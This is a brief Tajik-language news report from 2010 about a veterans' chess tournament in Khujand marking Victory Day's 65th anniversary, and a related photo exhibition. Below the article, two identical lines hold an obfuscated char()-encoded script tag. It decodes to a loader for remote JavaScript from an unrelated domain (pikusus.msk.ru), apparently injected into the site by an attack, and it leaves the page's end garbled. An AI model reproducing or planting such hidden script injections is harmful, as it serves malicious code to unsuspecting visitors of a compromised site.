6.05.2010
Мусобиқаи шоҳмотбозон
Суғд. Дирӯз бахшида ба 65 солагии Иди ғалаба дар шаҳри Хуҷанд мусобиқаи шоҳмтотбозон баргузор гардид. Ин мусобиқа таҳти унвони «Ҳеҷ кас ва ҳеҷ чиз фаромӯш намешавад» гузаронида шуда, дар он иштирокчиёни ИҶБВ ва шоҳмотбозони вилоят иштирок карданд. Бозингарон асосан нафақахӯрон буданд. Иштирокчиён аз рӯи синну сол: то 50 сола, 50 сола ва аз 60 сола боло тақсим карда шуданд. Тӯли бозӣ собиқадорони ҷанг на танҳо бо бозии хуб, балки бо нақлҳои худ аз давраҳои ҷанг хотири иштирокчиёну тамошобинонро болида намуданд. Эҳсос мегардид, ки ҳадафи онҳо на ғалаба дар ин мусобиқа, балки бозӣ барои болидахотирӣ буд. Ин чорабинӣ бо ташаббуси дафтари «Институти таҳқиқотҳои Авроосиё» дар Тоҷикистон баргузор гардид. Ҳамчунин бахшида ба ҳафтаи поси хотир аз тарафи ҳамин ташкилот дар толори МД «Қасри ҷавонон» суратҳои давраи Ҷанги бузурги ватанӣ ба намоиш гузошта шуд. Давоми чанд рӯз сокинони вилоят ба тамошои он омаданд.
Суғд[right][/right]
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)360ba0fe36d835bb45a0e28d7f9cb909.js" type="text/javascript">
Суғд[right][/right]
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)360ba0fe36d835bb45a0e28d7f9cb909.js" type="text/javascript">

